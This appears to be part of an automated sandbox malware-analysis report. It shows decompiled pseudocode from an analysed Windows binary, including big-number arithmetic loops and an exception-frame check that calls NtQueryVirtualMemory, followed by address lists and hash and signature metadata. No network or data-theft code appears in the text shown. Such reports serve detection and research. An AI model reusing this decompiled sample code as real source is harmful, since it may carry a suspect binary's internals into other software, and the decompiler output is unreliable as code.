                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										__eflags = _v584 & 0x00000001;
                                                                                                                                                                                                                                                                                    										if((_v584 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    											_v12 = _v12 - 1;
                                                                                                                                                                                                                                                                                    											_t441 = _v584 >> 1;
                                                                                                                                                                                                                                                                                    											__eflags = _t441;
                                                                                                                                                                                                                                                                                    											_v584 = _t441;
                                                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t377 = _v584 >> 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t377;
                                                                                                                                                                                                                                                                                    									_v36 = _t377;
                                                                                                                                                                                                                                                                                    									goto L49;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L28;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									L28:
                                                                                                                                                                                                                                                                                    									E00401F80(_v48, _v16, _a20);
                                                                                                                                                                                                                                                                                    									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                                    									_t471 = _t471 + 0x24;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} while (0 != 0);
                                                                                                                                                                                                                                                                                    								goto L29;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _v8;
                                                                                                                                                                                                                                                                                    							if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    								L67:
                                                                                                                                                                                                                                                                                    								E00402310(_a4, _a4, _v16, _a20);
                                                                                                                                                                                                                                                                                    								_t472 = _t471 + 0xc;
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									__eflags = _v16;
                                                                                                                                                                                                                                                                                    									if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    										E00402350(_v16, _v44);
                                                                                                                                                                                                                                                                                    										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									E00401430( &_v16);
                                                                                                                                                                                                                                                                                    									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} while (0 != 0);
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									__eflags = _v20;
                                                                                                                                                                                                                                                                                    									if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    										E00402350(_v20, _v44);
                                                                                                                                                                                                                                                                                    										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									E00401430( &_v20);
                                                                                                                                                                                                                                                                                    									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} while (0 != 0);
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									__eflags = _v48;
                                                                                                                                                                                                                                                                                    									if(_v48 != 0) {
                                                                                                                                                                                                                                                                                    										E00402350(_v48, _v44);
                                                                                                                                                                                                                                                                                    										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									E00401430( &_v48);
                                                                                                                                                                                                                                                                                    									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} while (0 != 0);
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									__eflags = _v52;
                                                                                                                                                                                                                                                                                    									if(_v52 != 0) {
                                                                                                                                                                                                                                                                                    										E00402350(_v52, _v44);
                                                                                                                                                                                                                                                                                    										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									E00401430( &_v52);
                                                                                                                                                                                                                                                                                    									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} while (0 != 0);
                                                                                                                                                                                                                                                                                    								_v24 = 1;
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									__eflags = _v24 - _v64;
                                                                                                                                                                                                                                                                                    									if(_v24 >= _v64) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										goto L83;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                                                                    										L83:
                                                                                                                                                                                                                                                                                    										_t416 = _v24;
                                                                                                                                                                                                                                                                                    										__eflags =  *(_t463 + _t416 * 4 - 0x240);
                                                                                                                                                                                                                                                                                    										if( *(_t463 + _t416 * 4 - 0x240) != 0) {
                                                                                                                                                                                                                                                                                    											E00402350( *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v44);
                                                                                                                                                                                                                                                                                    											_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										E00401430(_t463 + _v24 * 4 - 0x240);
                                                                                                                                                                                                                                                                                    										_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                                                                    									} while (0 != 0);
                                                                                                                                                                                                                                                                                    									_t282 = _v24 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t282;
                                                                                                                                                                                                                                                                                    									_v24 = _t282;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _v56;
                                                                                                                                                                                                                                                                                    							if(_v56 == 0) {
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                                                                                                                                                                                                                    									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                                    									_t471 = _t471 + 0x28;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} while (0 != 0);
                                                                                                                                                                                                                                                                                    								goto L67;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							E00402310(_v16, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                                                                                                                                                                                                                    							_t471 = _t471 + 0xc;
                                                                                                                                                                                                                                                                                    							_v56 = 0;
                                                                                                                                                                                                                                                                                    							goto L67;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						return E00402A00(__eflags, _a4, _a8, _a12, _a16, _a20);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00402880(_a4, _a8, _a20, _a16, _a20);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				E00402390(_t341, _a4, 1, _a20);
                                                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                                                    			}

















































                                                                                                                                                                                                                                                                                    0x00402e9d
                                                                                                                                                                                                                                                                                    0x00402ea1
                                                                                                                                                                                                                                                                                    0x00402ea6
                                                                                                                                                                                                                                                                                    0x00402ea9
                                                                                                                                                                                                                                                                                    0x00402eb6
                                                                                                                                                                                                                                                                                    0x00402ed4
                                                                                                                                                                                                                                                                                    0x00402edb
                                                                                                                                                                                                                                                                                    0x00402f03
                                                                                                                                                                                                                                                                                    0x00402f15
                                                                                                                                                                                                                                                                                    0x00402f15
                                                                                                                                                                                                                                                                                    0x00402f19
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00402f1b
                                                                                                                                                                                                                                                                                    0x00402f1f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00402f21
                                                                                                                                                                                                                                                                                    0x00402f2b
                                                                                                                                                                                                                                                                                    0x00402f31
                                                                                                                                                                                                                                                                                    0x00402f0f
                                                                                                                                                                                                                                                                                    0x00402f0f
                                                                                                                                                                                                                                                                                    0x00402f12
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00402f12
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00402f33
                                                                                                                                                                                                                                                                                    0x00402f37
                                                                                                                                                                                                                                                                                    0x00402f3b
                                                                                                                                                                                                                                                                                    0x00402f63
                                                                                                                                                                                                                                                                                    0x00402f72
                                                                                                                                                                                                                                                                                    0x00402f81
                                                                                                                                                                                                                                                                                    0x00402f90
                                                                                                                                                                                                                                                                                    0x00402f9f
                                                                                                                                                                                                                                                                                    0x00402fa5
                                                                                                                                                                                                                                                                                    0x00402fc5
                                                                                                                                                                                                                                                                                    0x00402fca
                                                                                                                                                                                                                                                                                    0x00402fda
                                                                                                                                                                                                                                                                                    0x00402fdd
                                                                                                                                                                                                                                                                                    0x00402fef
                                                                                                                                                                                                                                                                                    0x00402fef
                                                                                                                                                                                                                                                                                    0x00402ff2
                                                                                                                                                                                                                                                                                    0x00402ff5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040300a
                                                                                                                                                                                                                                                                                    0x0040302b
                                                                                                                                                                                                                                                                                    0x00403030
                                                                                                                                                                                                                                                                                    0x00403033
                                                                                                                                                                                                                                                                                    0x0040304a
                                                                                                                                                                                                                                                                                    0x00403073
                                                                                                                                                                                                                                                                                    0x00403078
                                                                                                                                                                                                                                                                                    0x0040307b
                                                                                                                                                                                                                                                                                    0x0040307b
                                                                                                                                                                                                                                                                                    0x00402fe9
                                                                                                                                                                                                                                                                                    0x00402fe9
                                                                                                                                                                                                                                                                                    0x00402fec
                                                                                                                                                                                                                                                                                    0x00402fec
                                                                                                                                                                                                                                                                                    0x00403084
                                                                                                                                                                                                                                                                                    0x00403093
                                                                                                                                                                                                                                                                                    0x00403098
                                                                                                                                                                                                                                                                                    0x0040309b
                                                                                                                                                                                                                                                                                    0x004030a1
                                                                                                                                                                                                                                                                                    0x004030b2
                                                                                                                                                                                                                                                                                    0x004030b2
                                                                                                                                                                                                                                                                                    0x004030b6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004030b8
                                                                                                                                                                                                                                                                                    0x004030be
                                                                                                                                                                                                                                                                                    0x004030c5
                                                                                                                                                                                                                                                                                    0x004030c8
                                                                                                                                                                                                                                                                                    0x004030ad
                                                                                                                                                                                                                                                                                    0x004030ad
                                                                                                                                                                                                                                                                                    0x004030af
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004030af
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004030ca
                                                                                                                                                                                                                                                                                    0x004030ce
                                                                                                                                                                                                                                                                                    0x004030d5
                                                                                                                                                                                                                                                                                    0x004030dc
                                                                                                                                                                                                                                                                                    0x004030e3
                                                                                                                                                                                                                                                                                    0x004030e3
                                                                                                                                                                                                                                                                                    0x004030ea
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004030f0
                                                                                                                                                                                                                                                                                    0x004030f4
                                                                                                                                                                                                                                                                                    0x00403130
                                                                                                                                                                                                                                                                                    0x00403130
                                                                                                                                                                                                                                                                                    0x00403134
                                                                                                                                                                                                                                                                                    0x00403229
                                                                                                                                                                                                                                                                                    0x0040322d
                                                                                                                                                                                                                                                                                    0x00403232
                                                                                                                                                                                                                                                                                    0x00403232
                                                                                                                                                                                                                                                                                    0x00403235
                                                                                                                                                                                                                                                                                    0x00403235
                                                                                                                                                                                                                                                                                    0x00403238
                                                                                                                                                                                                                                                                                    0x00403238
                                                                                                                                                                                                                                                                                    0x0040323c
                                                                                                                                                                                                                                                                                    0x004032c5
                                                                                                                                                                                                                                                                                    0x004032c5
                                                                                                                                                                                                                                                                                    0x004032c5
                                                                                                                                                                                                                                                                                    0x004032c9
                                                                                                                                                                                                                                                                                    0x004032e6
                                                                                                                                                                                                                                                                                    0x004032e6
                                                                                                                                                                                                                                                                                    0x004032e8
                                                                                                                                                                                                                                                                                    0x004032cb
                                                                                                                                                                                                                                                                                    0x004032cb
                                                                                                                                                                                                                                                                                    0x004032db
                                                                                                                                                                                                                                                                                    0x004032db
                                                                                                                                                                                                                                                                                    0x004032eb
                                                                                                                                                                                                                                                                                    0x004032eb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004032ef
                                                                                                                                                                                                                                                                                    0x00403242
                                                                                                                                                                                                                                                                                    0x00403246
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403248
                                                                                                                                                                                                                                                                                    0x0040324c
                                                                                                                                                                                                                                                                                    0x00403272
                                                                                                                                                                                                                                                                                    0x00403289
                                                                                                                                                                                                                                                                                    0x004032ab
                                                                                                                                                                                                                                                                                    0x004032b0
                                                                                                                                                                                                                                                                                    0x004032b3
                                                                                                                                                                                                                                                                                    0x004032b3
                                                                                                                                                                                                                                                                                    0x004032b7
                                                                                                                                                                                                                                                                                    0x004032b7
                                                                                                                                                                                                                                                                                    0x004032be
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004032be
                                                                                                                                                                                                                                                                                    0x00403261
                                                                                                                                                                                                                                                                                    0x00403266
                                                                                                                                                                                                                                                                                    0x00403269
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403269
                                                                                                                                                                                                                                                                                    0x0040313a
                                                                                                                                                                                                                                                                                    0x00403140
                                                                                                                                                                                                                                                                                    0x00403147
                                                                                                                                                                                                                                                                                    0x0040314a
                                                                                                                                                                                                                                                                                    0x00403227
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403227
                                                                                                                                                                                                                                                                                    0x00403150
                                                                                                                                                                                                                                                                                    0x0040315a
                                                                                                                                                                                                                                                                                    0x00403163
                                                                                                                                                                                                                                                                                    0x00403166
                                                                                                                                                                                                                                                                                    0x00403170
                                                                                                                                                                                                                                                                                    0x00403182
                                                                                                                                                                                                                                                                                    0x00403188
                                                                                                                                                                                                                                                                                    0x0040318b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040318d
                                                                                                                                                                                                                                                                                    0x0040318d
                                                                                                                                                                                                                                                                                    0x0040318d
                                                                                                                                                                                                                                                                                    0x00403191
                                                                                                                                                                                                                                                                                    0x004031a8
                                                                                                                                                                                                                                                                                    0x004031a8
                                                                                                                                                                                                                                                                                    0x004031aa
                                                                                                                                                                                                                                                                                    0x00403193
                                                                                                                                                                                                                                                                                    0x00403193
                                                                                                                                                                                                                                                                                    0x004031a0
                                                                                                                                                                                                                                                                                    0x004031a0
                                                                                                                                                                                                                                                                                    0x004031ad
                                                                                                                                                                                                                                                                                    0x004031ad
                                                                                                                                                                                                                                                                                    0x004031b9
                                                                                                                                                                                                                                                                                    0x004031bf
                                                                                                                                                                                                                                                                                    0x004031c3
                                                                                                                                                                                                                                                                                    0x004031c5
                                                                                                                                                                                                                                                                                    0x004031c8
                                                                                                                                                                                                                                                                                    0x004031cf
                                                                                                                                                                                                                                                                                    0x004031d2
                                                                                                                                                                                                                                                                                    0x004031da
                                                                                                                                                                                                                                                                                    0x004031da
                                                                                                                                                                                                                                                                                    0x004031dd
                                                                                                                                                                                                                                                                                    0x004031dd
                                                                                                                                                                                                                                                                                    0x004031d2
                                                                                                                                                                                                                                                                                    0x0040317c
                                                                                                                                                                                                                                                                                    0x0040317c
                                                                                                                                                                                                                                                                                    0x0040317f
                                                                                                                                                                                                                                                                                    0x0040317f
                                                                                                                                                                                                                                                                                    0x004031eb
                                                                                                                                                                                                                                                                                    0x00403207
                                                                                                                                                                                                                                                                                    0x00403207
                                                                                                                                                                                                                                                                                    0x0040320b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403213
                                                                                                                                                                                                                                                                                    0x00403216
                                                                                                                                                                                                                                                                                    0x004031f6
                                                                                                                                                                                                                                                                                    0x004031ff
                                                                                                                                                                                                                                                                                    0x004031ff
                                                                                                                                                                                                                                                                                    0x00403201
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403201
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403218
                                                                                                                                                                                                                                                                                    0x00403222
                                                                                                                                                                                                                                                                                    0x00403222
                                                                                                                                                                                                                                                                                    0x00403224
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004030f6
                                                                                                                                                                                                                                                                                    0x004030f6
                                                                                                                                                                                                                                                                                    0x00403102
                                                                                                                                                                                                                                                                                    0x00403124
                                                                                                                                                                                                                                                                                    0x00403129
                                                                                                                                                                                                                                                                                    0x0040312c
                                                                                                                                                                                                                                                                                    0x0040312c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004030f6
                                                                                                                                                                                                                                                                                    0x004032f4
                                                                                                                                                                                                                                                                                    0x004032f8
                                                                                                                                                                                                                                                                                    0x00403369
                                                                                                                                                                                                                                                                                    0x00403375
                                                                                                                                                                                                                                                                                    0x0040337a
                                                                                                                                                                                                                                                                                    0x0040337d
                                                                                                                                                                                                                                                                                    0x0040337d
                                                                                                                                                                                                                                                                                    0x00403381
                                                                                                                                                                                                                                                                                    0x0040338b
                                                                                                                                                                                                                                                                                    0x00403390
                                                                                                                                                                                                                                                                                    0x00403390
                                                                                                                                                                                                                                                                                    0x00403397
                                                                                                                                                                                                                                                                                    0x0040339c
                                                                                                                                                                                                                                                                                    0x0040339f
                                                                                                                                                                                                                                                                                    0x0040339f
                                                                                                                                                                                                                                                                                    0x004033a3
                                                                                                                                                                                                                                                                                    0x004033a3
                                                                                                                                                                                                                                                                                    0x004033a7
                                                                                                                                                                                                                                                                                    0x004033b1
                                                                                                                                                                                                                                                                                    0x004033b6
                                                                                                                                                                                                                                                                                    0x004033b6
                                                                                                                                                                                                                                                                                    0x004033bd
                                                                                                                                                                                                                                                                                    0x004033c2
                                                                                                                                                                                                                                                                                    0x004033c5
                                                                                                                                                                                                                                                                                    0x004033c5
                                                                                                                                                                                                                                                                                    0x004033c9
                                                                                                                                                                                                                                                                                    0x004033c9
                                                                                                                                                                                                                                                                                    0x004033cd
                                                                                                                                                                                                                                                                                    0x004033d7
                                                                                                                                                                                                                                                                                    0x004033dc
                                                                                                                                                                                                                                                                                    0x004033dc
                                                                                                                                                                                                                                                                                    0x004033e3
                                                                                                                                                                                                                                                                                    0x004033e8
                                                                                                                                                                                                                                                                                    0x004033eb
                                                                                                                                                                                                                                                                                    0x004033eb
                                                                                                                                                                                                                                                                                    0x004033ef
                                                                                                                                                                                                                                                                                    0x004033ef
                                                                                                                                                                                                                                                                                    0x004033f3
                                                                                                                                                                                                                                                                                    0x004033fd
                                                                                                                                                                                                                                                                                    0x00403402
                                                                                                                                                                                                                                                                                    0x00403402
                                                                                                                                                                                                                                                                                    0x00403409
                                                                                                                                                                                                                                                                                    0x0040340e
                                                                                                                                                                                                                                                                                    0x00403411
                                                                                                                                                                                                                                                                                    0x00403411
                                                                                                                                                                                                                                                                                    0x00403415
                                                                                                                                                                                                                                                                                    0x00403427
                                                                                                                                                                                                                                                                                    0x0040342a
                                                                                                                                                                                                                                                                                    0x0040342d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040342f
                                                                                                                                                                                                                                                                                    0x0040342f
                                                                                                                                                                                                                                                                                    0x0040342f
                                                                                                                                                                                                                                                                                    0x00403432
                                                                                                                                                                                                                                                                                    0x0040343a
                                                                                                                                                                                                                                                                                    0x0040344b
                                                                                                                                                                                                                                                                                    0x00403450
                                                                                                                                                                                                                                                                                    0x00403450
                                                                                                                                                                                                                                                                                    0x0040345e
                                                                                                                                                                                                                                                                                    0x00403463
                                                                                                                                                                                                                                                                                    0x00403466
                                                                                                                                                                                                                                                                                    0x00403466
                                                                                                                                                                                                                                                                                    0x00403421
                                                                                                                                                                                                                                                                                    0x00403421
                                                                                                                                                                                                                                                                                    0x00403424
                                                                                                                                                                                                                                                                                    0x00403424
                                                                                                                                                                                                                                                                                    0x0040346c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040346c
                                                                                                                                                                                                                                                                                    0x004032fa
                                                                                                                                                                                                                                                                                    0x004032fe
                                                                                                                                                                                                                                                                                    0x00403324
                                                                                                                                                                                                                                                                                    0x0040333b
                                                                                                                                                                                                                                                                                    0x0040335d
                                                                                                                                                                                                                                                                                    0x00403362
                                                                                                                                                                                                                                                                                    0x00403365
                                                                                                                                                                                                                                                                                    0x00403365
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403324
                                                                                                                                                                                                                                                                                    0x00403313
                                                                                                                                                                                                                                                                                    0x00403318
                                                                                                                                                                                                                                                                                    0x0040331b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040331b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00402f56
                                                                                                                                                                                                                                                                                    0x00402ef1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00402ef9
                                                                                                                                                                                                                                                                                    0x00402ec2
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: 5e51b0e8150dde029b3c4edd1cbe5eeac9906cc03eba8322a4fb12b8bbc05176
                                                                                                                                                                                                                                                                                    • Instruction ID: dcaf04cbbe1406b8af14a02fe98e1e1ae043b4e220957441d257f04af74a8b75
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e51b0e8150dde029b3c4edd1cbe5eeac9906cc03eba8322a4fb12b8bbc05176
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44124EB1D001099BCF14DF98D985AEFB7B9BB88305F14816DF909B7380D739AA41CBA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040EF2D(long _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                                                                                                                    								L60:
                                                                                                                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                                                    						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                                                    							_t81 =  *0x417638;
                                                                                                                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                                                                                                                    								if(_t61 < 0) {
